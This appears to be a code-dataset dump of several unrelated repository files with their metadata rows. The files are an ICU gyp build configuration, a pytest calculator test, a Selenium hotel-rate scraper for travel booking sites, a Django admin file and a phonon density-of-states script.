# Only build encoding coverters and detectors necessary for HTML5.
'UCONFIG_ONLY_HTML_CONVERSION=1',
# No dependency on the default platform encoding.
# Will cut down the code size.
'U_CHARSET_IS_UTF8=1',
],
'conditions': [
['component=="static_library"', {
'defines': [
'U_STATIC_IMPLEMENTATION',
],
}],
['(OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris" \
or OS=="netbsd" or OS=="mac" or OS=="android" or OS=="qnx") and \
(target_arch=="arm" or target_arch=="ia32" or \
target_arch=="mipsel" or target_arch=="mips")', {
'target_conditions': [
['_toolset=="host"', {
'cflags': [ '-m32' ],
'ldflags': [ '-m32' ],
'asflags': [ '-32' ],
'xcode_settings': {
'ARCHS': [ 'i386' ],
},
}],
],
}],
['(OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris" \
or OS=="netbsd" or OS=="mac" or OS=="android" or OS=="qnx") and \
(target_arch=="arm64" or target_arch=="x64" or \
target_arch=="mips64el" or target_arch=="mips64")', {
'target_conditions': [
['_toolset=="host"', {
'cflags': [ '-m64' ],
'ldflags': [ '-m64' ],
'asflags': [ '-64' ],
'xcode_settings': {
'ARCHS': [ 'x86_64' ],
},
}],
],
}],
],
'include_dirs': [
'source/common',
'source/i18n',
],
'msvs_disabled_warnings': [4005, 4068, 4355, 4996, 4267],
},
'conditions': [
['use_system_icu==0 or want_separate_host_toolset==1', {
'targets': [
{
'target_name': 'copy_icudt_dat',
'type': 'none',
# icudtl.dat is the same for both host/target, so this only supports a
# single toolset. If a target requires that the .dat file be copied
# to the output directory, it should explicitly depend on this target
# with the host toolset (like copy_icudt_dat#host).
'toolsets': [ 'host' ],
'copies': [{
'destination': '<(PRODUCT_DIR)',
'conditions': [
['OS == "android"', {
'files': [
'android/icudtl.dat',
],
} , { # else: OS != android
'conditions': [
# Big Endian
[ 'target_arch=="mips" or target_arch=="mips64"', {
'files': [
'common/icudtb.dat',
],
} , { # else: ! Big Endian = Little Endian
'files': [
'common/icudtl.dat',
],
}],
],
}],
],
}],
},
{
'target_name': 'data_assembly',
'type': 'none',
'conditions': [
[ 'target_arch=="mips" or target_arch=="mips64"', { # Big Endian
'data_assembly_inputs': [
'common/icudtb.dat',
],
'data_assembly_outputs': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S',
],
}, { # Little Endian
'data_assembly_outputs': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S',
],
'conditions': [
['OS == "android"', {
'data_assembly_inputs': [
'android/icudtl.dat',
],
} , { # else: OS!="android"
'data_assembly_inputs': [
'common/icudtl.dat',
],
}], # OS==android
],
}],
],
'sources': [
'<@(_data_assembly_inputs)',
],
'actions': [
{
'action_name': 'make_data_assembly',
'inputs': [
'scripts/make_data_assembly.py',
'<@(_data_assembly_inputs)',
],
'outputs': [
'<@(_data_assembly_outputs)',
],
'target_conditions': [
[ 'OS == "mac" or OS == "ios" or '
'((OS == "android" or OS == "qnx") and '
'_toolset == "host" and host_os == "mac")', {
'action': ['python', '<@(_inputs)', '<@(_outputs)', '--mac'],
} , {
'action': ['python', '<@(_inputs)', '<@(_outputs)'],
}],
],
},
],
},
{
'target_name': 'icudata',
'type': 'static_library',
'defines': [
'U_HIDE_DATA_SYMBOL',
],
'dependencies': [
'data_assembly#target',
],
'sources': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S',
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S',
],
'conditions': [
[ 'target_arch=="mips" or target_arch=="mips64"', {
'sources!': ['<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S'],
}, {
'sources!': ['<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S'],
}],
[ 'use_system_icu==1 and want_separate_host_toolset==1', {
'toolsets': ['host'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==0', {
'toolsets': ['target'],
}],
[ 'OS == "win" and icu_use_data_file_flag==0', {
'type': 'none',
'dependencies!': [
'data_assembly#target',
],
'copies': [
{
'destination': '<(PRODUCT_DIR)',
'files': [
'windows/icudt.dll',
],
},
],
}],
[ 'icu_use_data_file_flag==1', {
'type': 'none',
'dependencies!': [
'data_assembly#target',
],
# Remove any assembly data file.
'sources/': [['exclude', 'icudt[lb]_dat']],
# Make sure any binary depending on this gets the data file.
'conditions': [
['OS != "ios"', {
'dependencies': [
'copy_icudt_dat#host',
],
} , { # else: OS=="ios"
'link_settings': {
'mac_bundle_resources': [
'common/icudtl.dat',
],
},
}], # OS!=ios
], # conditions
}], # icu_use_data_file_flag
], # conditions
'target_conditions': [
[ 'OS == "win"', {
'sources!': [
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtl_dat.S',
'<(SHARED_INTERMEDIATE_DIR)/third_party/icu/icudtb_dat.S'
],
}],
], # target_conditions
},
{
'target_name': 'icui18n',
'type': '<(component)',
'sources': [
'<@(icui18n_sources)',
],
'defines': [
'U_I18N_IMPLEMENTATION',
],
'dependencies': [
'icuuc',
],
'direct_dependent_settings': {
'include_dirs': [
'source/i18n',
],
},
'variables': {
'clang_warning_flags': [
# ICU uses its own deprecated functions.
'-Wno-deprecated-declarations',
# ICU prefers `a && b || c` over `(a && b) || c`.
'-Wno-logical-op-parentheses',
# ICU has some `unsigned < 0` checks.
'-Wno-tautological-compare',
# ICU has some code with the pattern:
# if (found = uprv_getWindowsTimeZoneInfo(...))
'-Wno-parentheses',
],
},
# Since ICU wants to internally use its own deprecated APIs, don't
# complain about it.
'cflags': [
'-Wno-deprecated-declarations',
],
'cflags_cc': [
'-frtti',
],
'cflags_cc!': [
'-fno-rtti',
],
'xcode_settings': {
'GCC_ENABLE_CPP_RTTI': 'YES', # -frtti
},
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeTypeInfo': 'true',
},
},
'conditions': [
[ 'use_system_icu==1 and want_separate_host_toolset==1', {
'toolsets': ['host'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==0', {
'toolsets': ['target'],
}],
['OS == "android" and clang==0', {
# Disable sincos() optimization to avoid a linker error since
# Android's math library doesn't have sincos(). Either
# -fno-builtin-sin or -fno-builtin-cos works.
'cflags': [
'-fno-builtin-sin',
],
}],
[ 'OS == "win" and clang==1', {
# Note: General clang warnings should go in the
# clang_warning_flags block above.
'msvs_settings': {
'VCCLCompilerTool': {
'AdditionalOptions': [
# See http://bugs.icu-project.org/trac/ticket/11122
'-Wno-inline-new-delete',
'-Wno-implicit-exception-spec-mismatch',
],
},
},
}],
], # conditions
},
{
'target_name': 'icuuc',
'type': '<(component)',
'sources': [
'<@(icuuc_sources)',
],
'defines': [
'U_COMMON_IMPLEMENTATION',
],
'dependencies': [
'icudata',
],
'direct_dependent_settings': {
'include_dirs': [
'source/common',
],
'conditions': [
[ 'component=="static_library"', {
'defines': [
'U_STATIC_IMPLEMENTATION',
],
}],
],
},
'variables': {
'clang_warning_flags': [
# ICU uses its own deprecated functions.
'-Wno-deprecated-declarations',
# ICU prefers `a && b || c` over `(a && b) || c`.
'-Wno-logical-op-parentheses',
# ICU has some `unsigned < 0` checks.
'-Wno-tautological-compare',
# uresdata.c has switch(RES_GET_TYPE(x)) code. The
# RES_GET_TYPE macro returns an UResType enum, but some switch
# statement contains case values that aren't part of that
# enum (e.g. URES_TABLE32 which is in UResInternalType). This
# is on purpose.
'-Wno-switch',
# ICU has some code with the pattern:
# if (found = uprv_getWindowsTimeZoneInfo(...))
'-Wno-parentheses',
# ICU generally has no unused variables, but there are a few
# places where this warning triggers.
# See https://codereview.chromium.org/1222643002/ and
# http://www.icu-project.org/trac/ticket/11759.
'-Wno-unused-const-variable',
# ucnv2022.cpp contains three functions that are only used when
# certain preprocessor defines are set.
'-Wno-unused-function',
],
},
'cflags': [
# Since ICU wants to internally use its own deprecated APIs,
# don't complain about it.
'-Wno-deprecated-declarations',
'-Wno-unused-function',
],
'cflags_cc': [
'-frtti',
],
'cflags_cc!': [
'-fno-rtti',
],
'xcode_settings': {
'GCC_ENABLE_CPP_RTTI': 'YES', # -frtti
},
'msvs_settings': {
'VCCLCompilerTool': {
'RuntimeTypeInfo': 'true',
},
},
'all_dependent_settings': {
'msvs_settings': {
'VCLinkerTool': {
'AdditionalDependencies': [
'advapi32.lib',
],
},
},
},
'conditions': [
[ 'use_system_icu==1 and want_separate_host_toolset==1', {
'toolsets': ['host'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}],
[ 'use_system_icu==0 and want_separate_host_toolset==0', {
'toolsets': ['target'],
}],
[ 'OS == "win" or icu_use_data_file_flag==1', {
'sources': [
'source/stubdata/stubdata.c',
],
'defines': [
'U_ICUDATAENTRY_IN_COMMON',
],
}],
[ 'OS == "win" and clang==1', {
# Note: General clang warnings should go in the
# clang_warning_flags block above.
'msvs_settings': {
'VCCLCompilerTool': {
'AdditionalOptions': [
# See http://bugs.icu-project.org/trac/ticket/11122
'-Wno-inline-new-delete',
'-Wno-implicit-exception-spec-mismatch',
],
},
},
}],
], # conditions
},
], # targets
}],
['use_system_icu==1', {
'targets': [
{
'target_name': 'system_icu',
'type': 'none',
'conditions': [
['OS=="qnx"', {
'link_settings': {
'libraries': [
'-licui18n',
'-licuuc',
],
},
}],
['OS!="qnx"', {
'link_settings': {
'ldflags': [
'<!@(icu-config --ldflags)',
],
'libraries': [
'<!@(icu-config --ldflags-libsonly)',
],
},
}],
],
},
{
'target_name': 'icudata',
'type': 'none',
'dependencies': ['system_icu'],
'export_dependent_settings': ['system_icu'],
'toolsets': ['target'],
},
{
'target_name': 'icui18n',
'type': 'none',
'dependencies': ['system_icu'],
'export_dependent_settings': ['system_icu'],
'variables': {
'headers_root_path': 'source/i18n',
'header_filenames': [
# This list can easily be updated using the command below:
# find source/i18n/unicode -iname '*.h' \
# -printf " '%p',\n" | \
# sed -e 's|source/i18n/||' | sort -u
'unicode/alphaindex.h',
'unicode/basictz.h',
'unicode/calendar.h',
'unicode/choicfmt.h',
'unicode/coleitr.h',
'unicode/coll.h',
'unicode/compactdecimalformat.h',
'unicode/curramt.h',
'unicode/currpinf.h',
'unicode/currunit.h',
'unicode/datefmt.h',
'unicode/dcfmtsym.h',
'unicode/decimfmt.h',
'unicode/dtfmtsym.h',
'unicode/dtitvfmt.h',
'unicode/dtitvinf.h',
'unicode/dtptngen.h',
'unicode/dtrule.h',
'unicode/fieldpos.h',
'unicode/filteredbrk.h',
'unicode/fmtable.h',
'unicode/format.h',
'unicode/fpositer.h',
'unicode/gender.h',
'unicode/gregocal.h',
'unicode/locdspnm.h',
'unicode/measfmt.h',
'unicode/measunit.h',
'unicode/measure.h',
'unicode/msgfmt.h',
'unicode/numfmt.h',
'unicode/numsys.h',
'unicode/plurfmt.h',
'unicode/plurrule.h',
'unicode/rbnf.h',
'unicode/rbtz.h',
'unicode/regex.h',
'unicode/region.h',
'unicode/reldatefmt.h',
'unicode/scientificformathelper.h',
'unicode/search.h',
'unicode/selfmt.h',
'unicode/simpletz.h',
'unicode/smpdtfmt.h',
'unicode/sortkey.h',
'unicode/stsearch.h',
'unicode/tblcoll.h',
'unicode/timezone.h',
'unicode/tmunit.h',
'unicode/tmutamt.h',
'unicode/tmutfmt.h',
'unicode/translit.h',
'unicode/tzfmt.h',
'unicode/tznames.h',
'unicode/tzrule.h',
'unicode/tztrans.h',
'unicode/ucal.h',
'unicode/ucoleitr.h',
'unicode/ucol.h',
'unicode/ucsdet.h',
'unicode/ucurr.h',
'unicode/udateintervalformat.h',
'unicode/udat.h',
'unicode/udatpg.h',
'unicode/udisplaycontext.h',
'unicode/uformattable.h',
'unicode/ugender.h',
'unicode/uldnames.h',
'unicode/ulocdata.h',
'unicode/umsg.h',
'unicode/unirepl.h',
'unicode/unum.h',
'unicode/unumsys.h',
'unicode/upluralrules.h',
'unicode/uregex.h',
'unicode/uregion.h',
'unicode/usearch.h',
'unicode/uspoof.h',
'unicode/utmscale.h',
'unicode/utrans.h',
'unicode/vtzone.h',
],
},
'includes': [
'shim_headers.gypi',
],
'toolsets': ['target'],
},
{
'target_name': 'icuuc',
'type': 'none',
'dependencies': ['system_icu'],
'export_dependent_settings': ['system_icu'],
'variables': {
'headers_root_path': 'source/common',
'header_filenames': [
# This list can easily be updated using the command below:
# find source/common/unicode -iname '*.h' \
# -printf " '%p',\n" | \
# sed -e 's|source/common/||' | sort -u
'unicode/appendable.h',
'unicode/brkiter.h',
'unicode/bytestream.h',
'unicode/bytestriebuilder.h',
'unicode/bytestrie.h',
'unicode/caniter.h',
'unicode/chariter.h',
'unicode/dbbi.h',
'unicode/docmain.h',
'unicode/dtintrv.h',
'unicode/enumset.h',
'unicode/errorcode.h',
'unicode/icudataver.h',
'unicode/icuplug.h',
'unicode/idna.h',
'unicode/listformatter.h',
'unicode/localpointer.h',
'unicode/locid.h',
'unicode/messagepattern.h',
'unicode/normalizer2.h',
'unicode/normlzr.h',
'unicode/parseerr.h',
'unicode/parsepos.h',
'unicode/platform.h',
'unicode/ptypes.h',
'unicode/putil.h',
'unicode/rbbi.h',
'unicode/rep.h',
'unicode/resbund.h',
'unicode/schriter.h',
'unicode/std_string.h',
'unicode/strenum.h',
'unicode/stringpiece.h',
'unicode/stringtriebuilder.h',
'unicode/symtable.h',
'unicode/ubidi.h',
'unicode/ubrk.h',
'unicode/ucasemap.h',
'unicode/ucat.h',
'unicode/uchar.h',
'unicode/ucharstriebuilder.h',
'unicode/ucharstrie.h',
'unicode/uchriter.h',
'unicode/uclean.h',
'unicode/ucnv_cb.h',
'unicode/ucnv_err.h',
'unicode/ucnv.h',
'unicode/ucnvsel.h',
'unicode/uconfig.h',
'unicode/udata.h',
'unicode/uenum.h',
'unicode/uidna.h',
'unicode/uiter.h',
'unicode/uloc.h',
'unicode/umachine.h',
'unicode/umisc.h',
'unicode/unifilt.h',
'unicode/unifunct.h',
'unicode/unimatch.h',
'unicode/uniset.h',
'unicode/unistr.h',
'unicode/unorm2.h',
'unicode/unorm.h',
'unicode/uobject.h',
'unicode/urename.h',
'unicode/urep.h',
'unicode/ures.h',
'unicode/uscript.h',
'unicode/uset.h',
'unicode/usetiter.h',
'unicode/ushape.h',
'unicode/usprep.h',
'unicode/ustring.h',
'unicode/ustringtrie.h',
'unicode/utext.h',
'unicode/utf16.h',
'unicode/utf32.h',
'unicode/utf8.h',
'unicode/utf.h',
'unicode/utf_old.h',
'unicode/utrace.h',
'unicode/utypes.h',
'unicode/uvernum.h',
'unicode/uversion.h',
],
},
'includes': [
'shim_headers.gypi',
],
'toolsets': ['target'],
},
], # targets
}],
], # conditions
}
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
682db18a260da2b35963901c8f7ef28ba10bc1d1 | 4adab98ffdcb6bc99474b119cb7a80427f36271a | /test/test_cal_new.py | 9f0f4c7c0fa1b4af9bb864ec2e3a20293b425373 | [] | no_license | yangyq-github/hgwz_course | 4dde4470edf6ae4a9fff58a253c182a6905d0e79 | 0282da6bd8001dac184fc43415b82532b20b8a69 | refs/heads/master | 2023-04-23T12:06:56.900039 | 2021-04-25T11:15:45 | 2021-04-25T11:15:45 | 347,267,179 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | #!/usr/bin/python3
# coding : utf-8
# @Time : 2021/3/24 17:32
# @File : test_cal_new.py
__author__ = 'yangyanqin'
# 测试计算器--数据驱动方式
import pytest, sys, yaml
sys.path.append("../")
from Chapter_Pytest_Actual_Combat.calc import Calculator
with open("datas/cal_data.yml", encoding='utf-8') as f:
datas = yaml.safe_load(f)
addkeys = datas['add'].keys()
addvalues = datas['add'].values()
divkeys = datas['div'].keys()
divvalues = datas['div'].values()
class TestCalNew():
@pytest.mark.parametrize(('a', 'b', 'result')
, addvalues, ids=addkeys)
def test_add(self, a, b, result):
assert result == Calculator().add(a, b)
@pytest.mark.parametrize(('a', 'b', 'result')
, divvalues, ids=divkeys)
def test_div(self, a, b, result):
assert result == Calculator().div(a, b)
@pytest.mark.Env
class TestEnv():
def test_case(self, cmdoption):
print("测试环境的验证")
env, datas = cmdoption
print(f"环境:{env},数据:{datas}")
ip = datas['env']['ip']
port = datas['env']['port']
print("http://"+str(ip)+":"+str(port))
mydatas=[[1,2,3],[0.9,0.1,1]]
myids=['整数','浮点数']
# param1 需要和conftest 中处理的param1 保持一致
class TestCalNewOne():
def test_add(self, param1):
print(f"param={param1}")
print("动态生成测试用例")
# assert result == Calculator().add(a, b) | [
"yangbitmex@163.com"
] | yangbitmex@163.com |
53d552270fd2e4c5fce0a339f00a4a44899b6b65 | d483d0ad0f46df24ff247ee87e81bb8adc5df575 | /plugin/mvr_plugin/automation/regular1.py | 45e35735381f54720b4e849908249150aa664d75 | [
"MIT"
] | permissive | S3Infosoft/mvr-automation | 302090ec9cec45ff45d98e76375fc420fa9de746 | 75f582765f39919bf2c3a35997bed242bede788b | refs/heads/master | 2020-05-26T02:29:31.069682 | 2020-05-19T08:46:51 | 2020-05-19T08:46:51 | 188,076,198 | 0 | 0 | MIT | 2019-06-02T10:16:03 | 2019-05-22T16:30:56 | Python | UTF-8 | Python | false | false | 11,445 | py | from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from .local1 import *
import requests
# from Common import main_run
# from ddl_sql import Database
import datetime
S = "room_type_id_421644301"
def month_select(driver,din):
cindate,month,year=din.split('/')
cindate=int(cindate)
year=int(year)
month=int(month)
print(cindate,month,year)
dt=datetime.datetime.today()
cur_month=dt.month
cur_year=dt.year
if month==cur_month and year==cur_year:
print('m=cm and yr=cr')
else:
if month-cur_month>0:
if cur_year==year:
mon_diff=(month-cur_month)
for i in range(mon_diff):
driver.find_element_by_xpath('//*[@id="frm"]/div[1]/div[2]/div[2]/div/div/div[2]').click()
print('m-cm>0 and cy==yr')
return mon_diff
elif cur_year>year:
print('Invalid dates')
exit(0)
elif cur_year<year:
no_of_click = 12 * (year - cur_year)+(month - cur_month)
for i in range(no_of_click):
driver.find_element_by_xpath('//*[@id="frm"]/div[1]/div[2]/div[2]/div/div/div[2]/svg').click()
print('m-cm>0 and cy<yr')
return no_of_click
elif month<cur_month:
if year<=cur_year:
print("You cant checkin before today")
exit(0)
elif year>cur_year:
no_of_click=12*(year-cur_year)-(cur_month-month)
for i in range(no_of_click):
driver.find_element_by_xpath('//*[@id="frm"]/div[1]/div[2]/div[2]/div/div/div[2]/svg').click()
print('m<cm and cy<yr')
return no_of_click
def main():
agent = Booking()
search_text = "Ratnagiri"
hotel_name = "Mango Valley Resort Ganpatipule"
hotel_id = "4216443"
checkin = "30/03/2019"
checkout = "31/03/2019"
room_typeids = ["room_type_id_421644306", "room_type_id_421644302",
"room_type_id_421644305", "room_type_id_421644303"]
room_priceids = ["421644306_174652031_0_42_0",
"421644302_141698786_0_42_0", "421644302_174652031_0_42_0",
"421644305_174652031_0_42_0", "421644303_174652031_0_42_0"]
room_ids = ["roomrtc_45000574650", "roomrtc_45000574663", "roomrtc_45000653101", "roomrtc_45000574667"]
print(main_run(agent, hotel_id, search_text, checkin, checkout,
room_typeids=room_typeids, room_priceids=room_priceids))
# def calender_ctrl(agent, cin, cout,driver):
# driver.find_element_by_css_selector(agent.calender).click()
# print('a')
# # month_select(driver,din)
# print('b')
# cin = str("%01d" % int(cin))
# cout = str("%01d" % int(cout))
# flag1 = True
# flag2 = True
# weekin = str(0)
# weekout = str(0)
# for i in range(7):
# temp = driver.find_element_by_xpath(agent.week_finder+str(i+1)+"]").text.split(" ")
# print(temp)
# if any(cin in s for s in temp) and flag1:
# weekin = str(i+1)
# flag1 = False
# if any(cout in s for s in temp) and flag2:
# weekout = str(i+1)
# return weekin, weekout
def calender_ctrl_new(agent, cin, cout,driver,din,dout,datein,dateout):
driver.find_element_by_css_selector(agent.calender).click()
print('a')
cin = str("%01d" % int(cin))
no_of_click=month_select(driver,din)
flag1 = True
weekin = str(0)
print('b')
for i in range(7):
temp = driver.find_element_by_xpath(agent.week_finder + str(i + 1) + "]").text.split(" ")
print(temp)
if any(cin in s for s in temp) and flag1:
weekin = str(i + 1)
flag1 = False
driver.find_element_by_xpath(agent.day_in(weekin,datein)).click()
break
# now returning to current month
try:
for i in range(no_of_click):
driver.find_element_by_xpath('// *[ @ id = "frm"] / div[1] / div[2] / div[2] / div / div / div[1]').click()
except Exception as e:
print(e,e.args)
pass
print('c')
month_select(driver, dout)
time.sleep(1)
print('d')
cout = str("%01d" % int(cout))
flag2 = True
weekout=str(0)
for i in range(7):
temp = driver.find_element_by_xpath(agent.week_finder + str(i + 1) + "]").text.split(" ")
print(temp)
if any(cout in s for s in temp) and flag2:
weekout = str(i + 1)
driver.find_element_by_xpath(agent.day_out(weekout,dateout)).click()
return weekin, weekout
class MasterMMT(object):
@staticmethod
def run(search_text, hotel_id, hotel_name, din, dout, room_id):
current_time = datetime.datetime.now()
time1 = current_time.strftime("%Y-%m-%d %H:%M:%S")
# print(f"current time is {current_time} \n time1={time1}")
agent = Mmt()
agent_name = agent.__class__.__name__
driver = start_driver()
listed = agent.listing(driver, hotel_id, search_text, din, dout)
if int(listed)==0:
returndata = sql_entry('not found', agent_name, din, dout, f'{hotel_name} not found', time1,hotel_name)
driver.quit()
return returndata
driver = start_driver()
agent.hotel_find(driver, hotel_id, hotel_name, din, dout)
data = agent.data_scraping(driver, room_id)
print(data)
driver.quit()
returndata = sql_entry(listed, agent_name, din, dout, data, time1)
return returndata
def start_driver(clint):
global driver
options = Options()
options.add_argument("--headless")
options.add_argument('--window-size=1420,1080')
options.add_argument('--disable-gpu')
options.add_argument('--no-sandbox')
options.add_argument('--disable-dev-shm-usage')
options.add_argument("enable-automation");
options.add_argument("--disable-extensions");
options.add_argument("--dns-prefetch-disable");
options.add_argument("--disable-gpu");
# nodeurl = 'http://192.168.99.100:4445/wd/hub'
nodeurl = clint
# driver = webdriver.Chrome(chrome_options=options, executable_path=r'chromedriver.exe')
# url = driver.command_executor._url
caps = DesiredCapabilities.CHROME.copy()
# caps['max_duration'] = 100
print(caps)
driver = webdriver.Remote(
command_executor=nodeurl,
# desired_capabilities=DesiredCapabilities.CHROME)
desired_capabilities=caps)
driver.set_page_load_timeout(500)
driver.implicitly_wait(10)
driver.maximize_window()
return driver
def sql_entry(listed, agent_name, din, dout, data, time1,hotel_name):
current_time = datetime.datetime.now()
time2 = current_time.strftime("%Y-%m-%d %H:%M:%S")
# sql = Database()
# sql.create_table()
# sql.insert_table(time1, agent_name, din, dout, listed,
# str(data[0]), str(data[1]), str(data[2]), str(data[3]))
# sql.print_db()
returndata = {}
returndata['start_time'] = time1
returndata['end_time'] = time2
returndata['ota'] = agent_name
returndata['check_in'] = din
returndata['check_out'] = dout
returndata['listed_position'] = listed
# returndata['Std_EP'] = str(data[0])
# returndata['Std_CP'] = str(data[1])
# returndata['Sup_EP'] = str(data[2])
# returndata['Sup_CP'] = str(data[3])
i = 0
rates = {}
if type(data)==str:
returndata['rates'] = data
returndata['Status'] = 'NOT OK'
return returndata
while i < len(data):
rates[data[i]] = str(data[i+1])
i = i+2
returndata['rates'] = rates
returndata['Status'] = 'OK'
returndata['hotel_name']=hotel_name
return returndata
def main_run(agent, hotel_prop, search_text, din, dout,hotel_name,clint, **kwargs):
current_time = datetime.datetime.now()
time1 = current_time.strftime("%Y-%m-%d %H:%M:%S")
driver = start_driver(clint)
driver.maximize_window()
agent_name = agent.__class__.__name__
driver.get(agent.target)
cin, month, year = din.split("/")
cout, month_out, year_out = dout.split("/")
datein = year+"-"+month+"-"+cin
dateout = year_out+"-"+month_out+"-"+cout
print(datein,dateout)
try:
weekin, weekout = calender_ctrl_new(agent, cin, cout,driver,din,dout,datein,dateout)
except Exception as e:
print(e.args,e)
return driver
# month_select(driver,din)
# driver.find_element_by_xpath(agent.day_in(weekin, datein)).click()
# month_select(driver,dout)
# driver.find_element_by_xpath(agent.day_out(weekout, dateout)).click()
driver.find_element_by_id(agent.search_id).send_keys(search_text+Keys.ENTER)
time.sleep(1)
agent.proceed(driver)
listed = agent.listing(driver, hotel_prop)
# print('a')
if int(listed)==0:
returndata=sql_entry('Not found',agent_name,din,dout,f'{hotel_prop} not found',time1,hotel_name)
driver.quit()
return returndata
# print('b')
agent.hotel_find(driver, hotel_prop)
driver.switch_to.window(driver.window_handles[1])
print('ab')
time.sleep(5)
# driver.find_element_by_tag_name("body").send_keys("Keys.ESCAPE");
webdriver.ActionChains(driver).send_keys(Keys.ESCAPE).perform()
data = agent.data_scraping(driver, **kwargs)
time.sleep(1)
driver.quit()
returndata = sql_entry(listed, agent_name, din, dout, data, time1,hotel_name)
return returndata
def main_run_for_new_goibibo(driver,agent, hotel_prop, search_text, din, dout,hotel_name, **kwargs):
current_time = datetime.datetime.now()
time1 = current_time.strftime("%Y-%m-%d %H:%M:%S")
# driver = start_driver()
# agent_name = agent.__class__.__name__
# driver.get(agent.target)
agent=NewGoibibo()
driver.maximize_window()
agent_name = agent.__class__.__name__
cin, month, year = din.split("/")
cout, month, year = dout.split("/")
datein = year+"-"+month+"-"+cin
dateout = year+"-"+month+"-"+cout
driver.find_element_by_xpath('//*[@id="root"]/section/div/div[3]/section[1]/div[1]/div/div[3]/div/div[1]').click()
driver.find_element_by_xpath(agent.day_in(driver,datein)).click()
# time.sleep(5)
driver.find_element_by_xpath(agent.day_out(driver, dateout)).click()
driver.find_element_by_id(agent.search_id).send_keys(search_text+Keys.ENTER)
time.sleep(1)
agent.proceed(driver)
listed = agent.listing(driver, hotel_prop)
if int(listed)==0:
print('a')
returndata=sql_entry('Not found',agent_name,din,dout,f'{hotel_prop} not found',time1,hotel_name)
driver.quit()
return returndata
print('b')
agent.hotel_find(driver, hotel_prop,int(listed))
driver.switch_to.window(driver.window_handles[1])
time.sleep(5)
data = agent.data_scraping(driver)
time.sleep(1)
driver.quit()
returndata = sql_entry(listed, agent_name, din, dout, data, time1,hotel_name)
return returndata
# return True if element is visible within 30 seconds, otherwise False
if __name__ == "__main__":
main()
| [
"ssaannskra@gmail.com"
] | ssaannskra@gmail.com |
9b4de1d3e5726b763267418ceb084d36565e00af | e6a8793b1b12d47e57f00485350d122946618245 | /parents/admin.py | 6a80e0c0a7836d80d23fab02e3781a4109d89613 | [] | no_license | Fabricourt/school | 70b2eba2c0b8ff9b9290eb0f68d730698a6d3a63 | dad80c36be34b432dfadef195eb9e867f82cafff | refs/heads/main | 2023-01-01T15:48:43.760288 | 2020-10-26T11:15:32 | 2020-10-26T11:15:32 | 305,829,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | from django.contrib import admin
from .models import Parent
class ParentAdmin(admin.ModelAdmin):
list_display = ( 'name', 'account_date')
list_display_links = ( 'name',)
search_fields = ('name',)
list_per_page = 25
admin.site.register(Parent, ParentAdmin) | [
"mfalme2030@gmail.com"
] | mfalme2030@gmail.com |
50d9bcb586a1faed7b58e48723a78679a98837d8 | 279ed7207ac2c407487416b595e12f573049dd72 | /pybvk/apps/bvkdos.py | 13cba733f4b05f59814d552d8b8aa8f9f4c231a3 | [] | no_license | danse-inelastic/pybvk | 30388455e211fec69130930f2925fe16abe455bd | 922c8c0a8c50a9fabd619fa06e005cacc2d13a15 | refs/heads/master | 2016-09-15T22:21:13.131688 | 2014-06-25T17:12:34 | 2014-06-25T17:12:34 | 34,995,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,211 | py | #!/usr/bin/env python
# given the python module to create "system", calculate dos
# the python module is optional. if it is not given, then "system" file must exist already.
import os
def run(systempy, system, df, N, Vecs):
# if neither systempy nor system is specified, it is assumed that we have a "system" file
if not systempy and not system:
system = 'system'
# create temporary work directory
import tempfile
workdir = tempfile.mkdtemp()
# create the system file in the temporary work directory
from bvk.applications.executionharness import createSystem, execute
system = createSystem(workdir, systempy=systempy, system=system)
#
# build the command to run
Vecs = int(Vecs)
cmds = [
'bvkrandomQs %s' % N,
'bvkdisps %s' % Vecs,
'bvkpartialdos %s %s' % (Vecs, df),
]
return execute(cmds, workdir=workdir, outputfiles=['DOS'])
from optparse import OptionParser
def main():
usage = "usage: %prog [options] [system]"
parser = OptionParser(usage)
parser.add_option(
"-N", "--N-kpts-1D", dest="N",
default = 10,
help="Number of k points in 1D for sampling reciprocal space",
)
parser.add_option(
"-d", "--df", dest="df",
default = 0.1,
help="frequency axis bin size(THz)",
)
parser.add_option(
"-E", "--compute-eigen-vectors",
default = False,
help='compute eigne vectors or not?',
dest="Vecs",
)
parser.add_option(
'-P', '--system-python-file',
default = '',
help = 'python file that generates the "system" file when executed. when this option is supplied, please do not specify the "system" file path as the argument',
dest = 'systempy',
)
(options, args) = parser.parse_args()
if len(args) > 1:
parser.error("incorrect number of arguments")
if len(args) == 1:
system = args[0]
else:
system = None
N = int(options.N)
df = float(options.df)
Vecs= bool(options.Vecs)
systempy = options.systempy
return run(systempy, system, df, N, Vecs)
if __name__ == "__main__":
main()
| [
"linjiao@caltech.edu"
] | linjiao@caltech.edu |
